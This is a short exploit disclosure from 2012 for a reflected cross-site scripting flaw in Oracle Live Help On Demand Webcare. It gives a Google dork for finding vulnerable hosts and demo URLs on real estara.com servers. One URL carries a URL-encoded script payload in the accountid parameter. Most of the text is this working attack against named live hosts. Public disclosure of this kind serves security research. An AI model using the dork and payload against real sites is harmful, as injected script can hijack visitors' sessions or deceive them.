# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting # Date: 29.02.2012 # Author: Sony # Software Link: http://www.oracle.com/index.html # Google Dorks:inurl:UI/gui.php # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html .................................................................. Demo: http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here] http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034 or https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25×tamp=1321973587 http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034 http://2.bp.blogspot.com/-pGRIzWM5Ll0/T03bHKCWwmI/AAAAAAAAAo8/oaLXxGtydnc/s1600/oracle.JPG